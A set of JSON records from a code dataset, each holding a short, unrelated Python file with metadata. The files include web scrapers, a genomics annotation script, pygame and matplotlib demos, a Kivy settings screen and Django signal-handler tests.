{"seq_id": "282285189", "text": "import sys\nimport requests\nfrom selenium import webdriver\nfrom selenium.common.exceptions import NoSuchElementException\nimport time\n\n\n###############################😎 Split LINES IN .TXT FILE & opening WEBDRIVER at the 1st Url #####################################################\n\n\nwith open('links-penalty.txt','r') as fo:\n count=0\n for line in fo:\n count+=1\n \n url=line\n from selenium import webdriver\n driver=webdriver.PhantomJS('/home/jkernel/Desktop/python books/phantomjs/bin/phantomjs',service_args=['--load-images=no','--disk-cache=true'])\n driver.get(url)\n time.sleep(3)\n \n ##################################😎 HOME TEAM CONFIG ###################################################\n search_team1_name= driver.find_element_by_css_selector('div.hostteam div.name')\n search_team2_name= driver.find_element_by_css_selector('div.guestteam div.name')\n team1_name= search_team1_name.text\n team2_name= search_team2_name.text\n \n \n \n #Typwnei ta onomata omadwn\n print(team1_name,\"-\",team2_name)\n \n #typwnei tis red cards\n try:\n \tsearch_team1_red_card= driver.find_element_by_css_selector('div.statrow:nth-of-type(2) div.value:nth-of-type(1)')\n \tteam1_red_card=search_team1_red_card.text\n \t\n \tprint(\"Home Team Red Cards: \",team1_red_card)\n \tsearch_team2_red_card= driver.find_element_by_css_selector('div.statrow:nth-of-type(2) div.value:nth-of-type(3)')\n \tteam2_red_card=search_team2_red_card.text\n \tprint(\"Away Team Red Cards: \",team2_red_card) \t\n\n except NoSuchElementException:\n \tprint(\"No red card\")\n \n \n #dokimazei ean yparxei penalty\n try:\t \n\t search_team1_penalty= driver.find_element_by_css_selector('div.penalty')\n\t if(search_team1_penalty.is_displayed()==True):\n\t \tprint(team1_penalty_scored)\n except NoSuchElementException:\n \tprint(\"No penalty found\")\n \n \n \t\n try:\n\t search_penalty_missed= driver.find_element_by_css_selector('div.miss')\n except NoSuchElementException:\n \tprint(\"No missed penalty\")\n try:\n\t search_team1_own_goal= driver.find_element_by_css_selector('div.own')\n\t owngoal=search_team1_own_goal.text\n\t print(owngoal)\n except NoSuchElementException:\n \tprint(\"No own goal\")\n \t\n\n driver.quit()\n print(\"#######################################################\") \n\n\n\n", "sub_path": "match_details.py", "file_name": "match_details.py", "file_ext": "py", "file_size_in_byte": 2482, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "selenium.webdriver.PhantomJS", "line_number": 18, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 18, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 20, "usage_type": "call"}, {"api_name": "selenium.common.exceptions.NoSuchElementException", "line_number": 43, "usage_type": "name"}, {"api_name": "selenium.common.exceptions.NoSuchElementException", "line_number": 52, "usage_type": "name"}, {"api_name": "selenium.common.exceptions.NoSuchElementException", "line_number": 59, "usage_type": "name"}, {"api_name": "selenium.common.exceptions.NoSuchElementException", "line_number": 65, "usage_type": "name"}]} {"seq_id": "458134294", "text": "import sys, json\n\nANNOVAR_OUTPUT = 'ANNOVAR_MODIFIED_ClinVar2019_Patho_HasOMIM_Ambiguous_MGOS.tsv'\nHPOA_MIM_GENE_PAIRS = '/cluster/u/ayang/SyntheticPatients/onto/hpo/HPOA_unique_mim_gene_pairs.json'\nHPOA_ALL_GENES_PATH = '/cluster/u/ayang/SyntheticPatients/onto/hpo/HPOA_unique_genes.json'\n\nout = 
sys.stdout\nif len(sys.argv) > 1:\n out = open(sys.argv[1], 'w')\n\ndef extract_annovar_labeled_gene(line):\n ln = line.strip().split('\\t')\n return ln[12]\n\ndef extract_omim_from_preserved_info_field(line):\n ln = line.strip().split('\\t')[25].split(';')\n clndisdb = [x for x in ln if 'CLNDISDB=' in x][0].split('=')[-1].split(',')\n\n omim = [x for x in clndisdb if 'OMIM:' in x][0]\n\n return omim\n\ndef try_to_get_correct_genesymbol(genes):\n sep = genes.split(';')\n correct_gene = sep[0]\n for gene in sep:\n if gene in hpoa_all_genes:\n correct_gene = gene\n return correct_gene\n\nwith open(HPOA_MIM_GENE_PAIRS) as f:\n hpoa_omim_gene_pairs = set(tuple(pair) for pair in json.load(f))\n\nwith open(HPOA_ALL_GENES_PATH) as f:\n hpoa_all_genes = set(json.load(f))\n\nmatched = 0\nunmatched = 0\n\nwith open(ANNOVAR_OUTPUT) as f:\n for line in f:\n if line[0] == '#':\n print(line.strip(), file=out)\n continue\n \n annovar_labeled_gene = extract_annovar_labeled_gene(line)\n if ';' in annovar_labeled_gene:\n annovar_labeled_gene = try_to_get_correct_genesymbol(annovar_labeled_gene)\n omim = extract_omim_from_preserved_info_field(line)\n\n if tuple([omim, annovar_labeled_gene]) in hpoa_omim_gene_pairs:\n print('{}\\t{}|{}'.format(line.strip(), omim, annovar_labeled_gene), file=out)\n matched += 1\n \n else:\n print('{}\\t.'.format(line.strip()), file=out)\n unmatched += 1\n\nprint('Successfully matched {} variants from ANNOVAR output that had (OMIM, gene) pairs in HPO-A.'.format(matched))\nprint('Could not match {} variants because (OMIM, gene) pair not found in HPO-A.'.format(unmatched))\n\n\nif out != sys.stdout:\n out.close()", "sub_path": "onto/clinvar/Clean/Ambiguous/MGOS/append_omim_gene_pair_to_annovar_if_possible.py", "file_name": "append_omim_gene_pair_to_annovar_if_possible.py", "file_ext": "py", "file_size_in_byte": 1968, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "sys.stdout", "line_number": 7, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 8, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 9, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 32, "usage_type": "call"}, {"api_name": "json.load", "line_number": 35, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 63, "usage_type": "attribute"}]} {"seq_id": "638761106", "text": "import pygame\n\nclass Asteroid(pygame.sprite.Sprite):\n def __init__(self,size,x,y,color):\n super().__init__()\n self.size = size\n self.color = color\n self.image = pygame.Surface( (self.size, self.size))\n self.image.fill(self.color)\n self.rect = self.image.get_rect(topleft=(x, y))\n\n\n", "sub_path": "asteroid.py", "file_name": "asteroid.py", "file_ext": "py", "file_size_in_byte": 326, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "pygame.sprite", "line_number": 3, "usage_type": "attribute"}, {"api_name": "pygame.Surface", "line_number": 8, "usage_type": "call"}]} {"seq_id": "566521495", "text": "from loguru import logger\n\nfrom sinric import Sinric\n\napiKey = \"Api Key\"\n\n\ndef power_state(deviceId, state):\n logger.info(\"{} {}\", deviceId, state)\n\n\ndef set_target_temp(deviceId, value, scale):\n logger.info(\"{} {} {}\", deviceId, value, scale)\n\n\ndef adjust_target_temp(deviceId, value, scale):\n logger.info(\"{} {} {}\", deviceId, value, scale)\n\n\ndef set_thermostat_mode(deviceId, value):\n logger.info(\"{} {}\", 
deviceId, value)\n\n\ncallbacks = {\n \"setPowerState\": power_state,\n \"SetTargetTemperature\": set_target_temp,\n \"AdjustTargetTemperature\": adjust_target_temp,\n \"SetThermostatMode\": set_thermostat_mode,\n}\n\nif __name__ == \"__main__\":\n ob = Sinric(apiKey, callbacks)\n ob.handle()\n", "sub_path": "python_examples/examples/thermostat_example.py", "file_name": "thermostat_example.py", "file_ext": "py", "file_size_in_byte": 711, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "loguru.logger.info", "line_number": 9, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 9, "usage_type": "name"}, {"api_name": "loguru.logger.info", "line_number": 13, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 13, "usage_type": "name"}, {"api_name": "loguru.logger.info", "line_number": 17, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 17, "usage_type": "name"}, {"api_name": "loguru.logger.info", "line_number": 21, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 21, "usage_type": "name"}, {"api_name": "sinric.Sinric", "line_number": 32, "usage_type": "call"}]} {"seq_id": "275238645", "text": "# -*- coding: utf-8 -*-\n# @Time : 20-6-4 下午2:13\n# @Author : zhuying\n# @Company : Minivision\n# @File : utility.py\n# @Software : PyCharm\n\nfrom datetime import datetime\nimport os\nimport torch\nimport numpy as np\n\ndef get_time():\n return (str(datetime.now())[:-10]).replace(' ', '-').replace(':', '-')\n\n\ndef get_kernel(height, width):\n kernel_size = ((height + 15) // 16, (width + 15) // 16)\n return kernel_size\n\n\ndef get_width_height(patch_info):\n w_input = int(patch_info.split('x')[-1])\n h_input = int(patch_info.split('x')[0].split('_')[-1])\n return w_input,h_input\n\n\ndef parse_model_name(model_name):\n info = model_name.split('_')[0:-1]\n h_input, w_input = info[-1].split('x')\n model_type = model_name.split('.pth')[0].split('_')[-1]\n\n if info[0] == \"org\":\n scale = None\n else:\n scale = float(info[0])\n return int(h_input), int(w_input), model_type, scale\n\ndef parse_model_name_new_format(model_name):\n info = model_name.split('_')[0:-2]\n h_input, w_input = info[-1].split('x')\n model_type = \"MiniFASNetV1SE\"\n\n if info[0] == \"org\":\n scale = None\n else:\n scale = float(info[3])\n return int(h_input), int(w_input), model_type, scale\n\ndef make_if_not_exist(folder_path):\n if not os.path.exists(folder_path):\n os.makedirs(folder_path)\n\n\n\"\"\"\nUse in PyTorch.\n\"\"\"\n\ndef accuracy(output, target):\n \"\"\"Computes the accuracy for multiple binary predictions\"\"\"\n pred = output >= 0.5\n truth = target >= 0.5\n acc = pred.eq(truth).sum() / target.numel()\n return acc\n\n\nclass BinaryClassificationMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.tp = 0\n self.tn = 0\n self.fp = 0\n self.fn = 0\n self.acc = 0\n self.pre = 0\n self.rec = 0\n self.f1 = 0\n\n def update(self, pred, target):\n pred = torch.tensor(pred)\n target = torch.tensor(target)\n self.tp = pred.mul(target).sum(0).float()\n self.tn = (1 - pred).mul(1 - target).sum(0).float()\n self.fp = pred.mul(1 - target).sum(0).float()\n self.fn = (1 - pred).mul(target).sum(0).float()\n self.acc = (self.tp + self.tn).sum() / (self.tp + self.tn + self.fp + self.fn).sum()\n self.pre = self.tp / (self.tp + self.fp)\n self.rec = self.tp / (self.tp + self.fn)\n self.f1 = (2.0 * 
self.tp) / (2.0 * self.tp + self.fp + self.fn)\n self.avg_pre = np.nanmean(self.pre)\n self.avg_rec = np.nanmean(self.rec)\n self.avg_f1 = np.nanmean(self.f1)\n # print(\"tp, tn, fp, fn: \", self.tp.item(), self.tn.item(), self.fp.item(), self.fn.item())", "sub_path": "src/utility.py", "file_name": "utility.py", "file_ext": "py", "file_size_in_byte": 2716, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "datetime.datetime.now", "line_number": 14, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 14, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path", "line_number": 51, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 95, "usage_type": "call"}]} {"seq_id": "334080852", "text": "'''\r\nCreated on 10 feb. 2018\r\n\r\n@author: Sven\r\n'''\r\n\r\nif __name__ == '__main__':\r\n pass\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib as mpl\r\nfrom matplotlib.lines import Line2D\r\n\r\n# Prepare 100 random numbers to plot\r\nx = np.random.rand(100)\r\ny = np.random.rand(100)\r\n# Prepare 100 random numbers within the range of the number of\r\n# available markers as index\r\n# Each random number will serve as the choice of marker of the\r\n# corresponding coordinates\r\nmarkerindex = np.random.randint(0, len(Line2D.markers), 100)\r\nprint(markerindex)\r\n\r\n# shows possible markers and abbreviation\r\nprint(Line2D.markers)\r\n\r\n# Plot all kinds of available markers at random coordinates\r\n# for each type of marker, plot a point at the above generated\r\n# random coordinates with the marker type\r\nfor k, m in enumerate(Line2D.markers):\r\n i = (markerindex == k)\r\n plt.scatter(x[i], y[i], marker=m)\r\n\r\nplt.show()\r\n\r\n# Prepare 5 lines\r\nx = np.linspace(0,20,10)\r\ny1 = x\r\ny2 = x*2\r\ny3 = x*3\r\ny4 = x*4\r\ny5 = x*5\r\n\r\n\r\n# Plot lines with different marker sizes\r\nplt.plot(x,y1,label = 'x', lw=1, marker='s', ms=5) # square size 10\r\nplt.plot(x,y2,label = '2x', lw=1, marker='^', ms=6) # triangle size 12\r\nplt.plot(x,y3,label = '3x', lw=1, marker='o', ms=5) # circle size 10\r\nplt.plot(x,y4,label = '4x', lw=1, marker='D', ms=4) # diamond size 8\r\nplt.plot(x,y5,label = '5x', lw=1, marker='P', ms=6) # filled plus sign\r\n# size 12\r\n\r\n# get current axes and store it to ax\r\nax = plt.gca()\r\nplt.legend()\r\nplt.show()\r\n", "sub_path": "LearnPython/scripts/learnmathplotlib/markers.py", "file_name": "markers.py", "file_ext": "py", "file_size_in_byte": 1537, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "numpy.random.rand", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 16, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 17, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 22, 
"usage_type": "attribute"}, {"api_name": "matplotlib.lines.Line2D.markers", "line_number": 22, "usage_type": "attribute"}, {"api_name": "matplotlib.lines.Line2D", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.lines.Line2D.markers", "line_number": 26, "usage_type": "attribute"}, {"api_name": "matplotlib.lines.Line2D", "line_number": 26, "usage_type": "name"}, {"api_name": "matplotlib.lines.Line2D.markers", "line_number": 31, "usage_type": "attribute"}, {"api_name": "matplotlib.lines.Line2D", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}]} {"seq_id": "91546305", "text": "import time\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport sys\n\n\ndef dailystatistics(finish):\n with open(finish, 'r') as f:\n content = f.readlines()\n\n times = []\n for i in content:\n if not i.startswith(\"/\") and i:\n temp = time.strptime(i.strip(), \"%a %b %d %H:%M:%S CST %Y\")\n a = time.strftime('%F',temp)\n times.append(a)\n\n datas = pd.DatetimeIndex(times)\n jobs = np.ones(len(datas))\n data = pd.DataFrame(data=jobs, index=times, columns=['job'])\n new_jobs = data.groupby(level=0)\n zjw = new_jobs.count()\n zjw.sort_index()['job'].plot()\n plt.show()\n\nif __name__ == \"__main__\":\n # finish = \"/Users/zhangjiawei/Documents/code/researchcode/dailystatistics/finish\"\n dailystatistics(finish=sys.argv[1])\n", "sub_path": "dailystatistics/dailyjobplot.py", "file_name": "dailyjobplot.py", "file_ext": "py", "file_size_in_byte": 811, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "time.strptime", "line_number": 15, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 16, "usage_type": "call"}, {"api_name": "pandas.DatetimeIndex", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 20, "usage_type": "call"}, {"api_name": 
"pandas.DataFrame", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 29, "usage_type": "attribute"}]} {"seq_id": "154532039", "text": "import pygame\r\npygame.init()\r\n\r\nFULL_SCREEN_SIZE = pygame.display.list_modes()[0]\r\nWIN_SIZE = [i // 4 for i in FULL_SCREEN_SIZE]\r\n\r\nscreen = pygame.display.set_mode(WIN_SIZE)\r\n\r\nrun = True\r\nwhile run:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n run = False\r\n \r\n pygame.display.flip()\r\n\r\npygame.quit()\r\n", "sub_path": "demo/demo.py", "file_name": "demo.py", "file_ext": "py", "file_size_in_byte": 354, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "pygame.init", "line_number": 2, "usage_type": "call"}, {"api_name": "pygame.display.list_modes", "line_number": 4, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 4, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 7, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 7, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 11, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 11, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 12, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 15, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 17, "usage_type": "call"}]} {"seq_id": "593017022", "text": "\n\nfrom scrapy.selector import HtmlXPathSelector\nfrom scrapy.spider import BaseSpider\nfrom scrapy.http import Request\n\nDOMAIN = 'intranet.iitg.ernet.in/'\nURL = 'http://intranet.iitg.ernet.in/'\nlis=[]\nindex_element = 0 \n\nclass MySpider(BaseSpider):\n name = 'crawler'\n #allowed_domains = [DOMAIN]\n start_urls = [\n URL\n ]\n\n def parse(self, response):\n hxs = HtmlXPathSelector(response)\n for url in hxs.select('//a/@href').extract():\n if not ( url.startswith('http://') or url.startswith('https://') ):\n url= URL + url\n if 'iitg' in url:\n if url not in lis:\n lis.append(url) \n fo=open('finallink.txt','a')\n fo.write(url + \"\\n\")\n fo.close()\n yield Request(url, callback=self.parse)\n\n", "sub_path": "crawler iitg intranet/craigslist_sample/spiders/test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 860, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "scrapy.spider.BaseSpider", "line_number": 12, "usage_type": "name"}, {"api_name": "scrapy.selector.HtmlXPathSelector", "line_number": 20, "usage_type": "call"}, {"api_name": "scrapy.http.Request", "line_number": 30, "usage_type": "call"}]} {"seq_id": "290820648", "text": "import requests\nimport json\nfrom bs4 import BeautifulSoup\nimport pandas as pd\n\nwinners_wiki_url = 'https://en.wikipedia.org/w/api.php?action=parse&format=json&prop=text&page=List_of_2016_Summer_Olympics_medal_winners§ion='\n# response = requests.get(wiki_url)\n# data = json.loads(response.text)\n# print(data)\n\n\nhtml_index_list = list(range(1, 78))\nremoveable_indicies = [2, 7, 12, 17, 22, 26, 33, 39, 43, 47, 51, 54, 59, 68, 71, 75, 76, 77, 78]\nfor index in removeable_indicies:\n if index in (html_index_list):\n 
html_index_list.remove(index)\n\nfor index in html_index_list:\n    url = winners_wiki_url + str(index)\n    response = requests.get(url)\n    HTML = json.loads(response.text)['parse']['text']['*']\n\n\n\n\n\n", "sub_path": "Citadel Data Open/Code/webscrape.py", "file_name": "webscrape.py", "file_ext": "py", "file_size_in_byte": 723, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "requests.get", "line_number": 20, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 21, "usage_type": "call"}]} {"seq_id": "343837793", "text": "import setuptools\n\nwith open(\"../README.md\", \"r\", encoding=\"utf-8\") as fh:\n    long_description = fh.read()\n\n\nsetuptools.setup(\n    name=\"cog\",\n    version=\"0.0.1\",\n    author_email=\"team@replicate.ai\",\n    description=\"Containers for machine learning\",\n    long_description=long_description,\n    long_description_content_type=\"text/markdown\",\n    url=\"https://github.com/replicate/cog\",\n    license=\"Apache License 2.0\",\n    python_requires=\">=3.6.0\",\n    install_requires=[\n        # intentionally loose. perhaps these should be vendored to not collide with user code?\n        \"flask>=2,<3\",\n        \"redis>=3,<4\",\n        \"requests>=2,<3\",\n        \"PyYAML\",\n    ],\n    packages=setuptools.find_packages(),\n)\n", "sub_path": "python/setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 708, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "setuptools.setup", "line_number": 7, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 24, "usage_type": "call"}]} {"seq_id": "416839433", "text": "# -*- coding: utf-8 -*-\nimport mywallet\nimport uuosconfig\n\nfrom kivy.uix.button import Label\nfrom kivy.clock import Clock\nfrom kivy.uix.screenmanager import ScreenManager, Screen\nfrom kivy.uix.popup import Popup\nfrom customui import show_reminder\nfrom lang import tr\n\nclass LanguageDialog(Popup):\n    def __init__(self, action):\n        super(LanguageDialog, self).__init__()\n        language = uuosconfig.get_value('language')\n        if language is None:\n            language = 1\n        if language == 0:\n            self.index = 0\n            self.ids.box_english.active = True\n        elif language == 1:\n            self.index = 1\n            self.ids.box_chinese.active = True\n    \n    def on_ok(self):\n        print(self.index)\n        uuosconfig.set_value('language', self.index)\n        lang_name = ['en', 'cn'][self.index]\n        uuosconfig.app.switch_lang(lang_name)\n        uuosconfig.set_value('lang', lang_name)\n        self.dismiss()\n\n    def on_cancel(self):\n        self.dismiss()\n\nclass ThemingDialog(Popup):\n    def __init__(self):\n        super(ThemingDialog, self).__init__()\n        theme = uuosconfig.get_current_theme()\n        self.setting = uuosconfig.get_current_theme()\n        #self.ids.id_switch_theme.bind(on_press=uuosconfig.app.switch_theme)\n        if theme == 'normal':\n            self.ids.id_normal.active = True\n            self.ids.id_black.active = False\n            self.setting = 'normal'\n        else:\n            self.ids.id_normal.active = False\n            self.ids.id_black.active = True\n            self.setting = 'black'\n    def on_ok(self):\n        show_reminder(tr._('Restart App to make the new settings take effect'))\n        uuosconfig.set_current_theme(self.setting)\n        uuosconfig.app.switch_theme(self.setting)\n        #self.change_bgcolor(self.setting)\n        #print(uuosconfig.app.theme)\n        self.dismiss()\n\nclass SettingScreen(Screen):\n    def __init__(self, **kargs):\n        super(SettingScreen, self).__init__(**kargs)\n        print(uuosconfig.get_current_theme())\n\n    def swith_language(self):\n        self.dialog = LanguageDialog(self.on_ok)\n        
self.dialog.ids.id_chinese.text = '中文'\n self.dialog.open()\n\n def check_upgrade(self):\n show_reminder(tr._(\"No upgrade detected\"))\n\n def on_ok(self):\n self.dialog.on_ok()\n self.dialog.dismiss()\n\n def swith_theme(self):\n popup = ThemingDialog()\n popup.open()\n print(uuosconfig.app.theme)\n \n # def set_bgcolor(self,theme):\n # if theme == 'normal':\n # uuosconfig.bg_color = [0.965,0.965,0.965,1]\n # else \n # uuosconfig.bg_color = [0.1176,0.1294,0.1647,1]", "sub_path": "settingscreen.py", "file_name": "settingscreen.py", "file_ext": "py", "file_size_in_byte": 2685, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "kivy.uix.popup.Popup", "line_number": 12, "usage_type": "name"}, {"api_name": "uuosconfig.get_value", "line_number": 15, "usage_type": "call"}, {"api_name": "uuosconfig.set_value", "line_number": 27, "usage_type": "call"}, {"api_name": "uuosconfig.app.switch_lang", "line_number": 29, "usage_type": "call"}, {"api_name": "uuosconfig.app", "line_number": 29, "usage_type": "attribute"}, {"api_name": "uuosconfig.set_value", "line_number": 30, "usage_type": "call"}, {"api_name": "kivy.uix.popup.Popup", "line_number": 36, "usage_type": "name"}, {"api_name": "uuosconfig.get_current_theme", "line_number": 39, "usage_type": "call"}, {"api_name": "uuosconfig.get_current_theme", "line_number": 40, "usage_type": "call"}, {"api_name": "customui.show_reminder", "line_number": 51, "usage_type": "call"}, {"api_name": "lang.tr._", "line_number": 51, "usage_type": "call"}, {"api_name": "lang.tr", "line_number": 51, "usage_type": "name"}, {"api_name": "uuosconfig.set_current_theme", "line_number": 52, "usage_type": "call"}, {"api_name": "uuosconfig.app.switch_theme", "line_number": 53, "usage_type": "call"}, {"api_name": "uuosconfig.app", "line_number": 53, "usage_type": "attribute"}, {"api_name": "kivy.uix.screenmanager.Screen", "line_number": 58, "usage_type": "name"}, {"api_name": "uuosconfig.get_current_theme", "line_number": 61, "usage_type": "call"}, {"api_name": "customui.show_reminder", "line_number": 69, "usage_type": "call"}, {"api_name": "lang.tr._", "line_number": 69, "usage_type": "call"}, {"api_name": "lang.tr", "line_number": 69, "usage_type": "name"}, {"api_name": "uuosconfig.app", "line_number": 78, "usage_type": "attribute"}]} {"seq_id": "194952019", "text": "from __future__ import absolute_import, print_function, unicode_literals\n\nfrom django.db.models.signals import post_init, post_save\nfrom django.dispatch import Signal\nfrom django.test import TestCase\nfrom tests.myapp.models import Foo, test_handler\nfrom roadies.handlers import handler, Handler\n\ntry:\n import mock\nexcept ImportError:\n from unittest import mock\n\n\ndef async_action(*args):\n pass\n\n\n@handler\ndef do_something(sender, foo, bar, **kwargs):\n \"\"\"Test functional handlers.\"\"\"\n async_action(foo, bar)\n\n\n@handler(post_init, sender='myapp.Foo', dispatch_uid='testing')\ndef do_something_else(sender, instance, **kwargs):\n async_action(instance)\n\n\ntest_signal = Signal(providing_args=['foo', 'bar'])\n\n\nclass HandlerTests(TestCase):\n\n def test_do_something_is_handler_instance(self):\n self.assertIsInstance(do_something, Handler)\n\n def test_connect_no_sender(self):\n do_something.connect(test_signal, dispatch_uid='testing')\n result = do_something.disconnect(test_signal, dispatch_uid='testing')\n self.assertTrue(result)\n result = do_something.disconnect(test_signal, dispatch_uid='testing')\n 
self.assertFalse(result)\n\n def test_connect_with_sender_string(self):\n do_something.connect(\n test_signal,\n sender='myapp.Foo',\n dispatch_uid='testing'\n )\n disconnected = do_something.disconnect(\n test_signal,\n sender='myapp.Foo',\n dispatch_uid='testing'\n )\n self.assertTrue(disconnected)\n\n disconnected = do_something.disconnect(\n test_signal,\n sender='myapp.Foo',\n dispatch_uid='testing'\n )\n self.assertFalse(disconnected)\n\n def test_do_something_name(self):\n self.assertEqual(do_something.__name__, 'do_something')\n\n def test_do_something_module(self):\n self.assertEqual(do_something.__module__, 'tests.test_handlers')\n\n def test_do_something_doc(self):\n self.assertEqual(do_something.__doc__, 'Test functional handlers.')\n\n def test_do_something_does_something_on_signal(self):\n do_something.connect(test_signal, dispatch_uid='testing')\n with mock.patch('tests.test_handlers.async_action') as func:\n test_signal.send(None, foo=1, bar=2)\n self.assertTrue(func.called)\n func.assert_called_once_with(1, 2)\n\n def test_do_something_else_is_handler(self):\n self.assertIsInstance(do_something_else, Handler)\n\n def test_do_something_else_executed_on_post_init(self):\n with mock.patch('tests.test_handlers.async_action') as func:\n instance = Foo(bar='baz')\n self.assertTrue(func.called)\n func.assert_called_once_with(instance)\n\n def test_calling_the_handler_directly(self):\n with mock.patch('tests.test_handlers.async_action') as func:\n do_something(None, 'foo', 'bar')\n self.assertTrue(func.called)\n func.assert_called_once_with('foo', 'bar')\n\n def test_autodiscover_works(self):\n self.assertTrue(\n post_save.disconnect(test_handler, dispatch_uid='test_handler')\n )\n", "sub_path": "tests/test_handlers.py", "file_name": "test_handlers.py", "file_ext": "py", "file_size_in_byte": 3185, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "roadies.handlers.handler", "line_number": 19, "usage_type": "name"}, {"api_name": "roadies.handlers.handler", "line_number": 25, "usage_type": "call"}, {"api_name": "django.db.models.signals.post_init", "line_number": 25, "usage_type": "argument"}, {"api_name": "django.dispatch.Signal", "line_number": 30, "usage_type": "call"}, {"api_name": "django.test.TestCase", "line_number": 33, "usage_type": "name"}, {"api_name": "roadies.handlers.Handler", "line_number": 36, "usage_type": "argument"}, {"api_name": "unittest.mock.patch", "line_number": 76, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 76, "usage_type": "name"}, {"api_name": 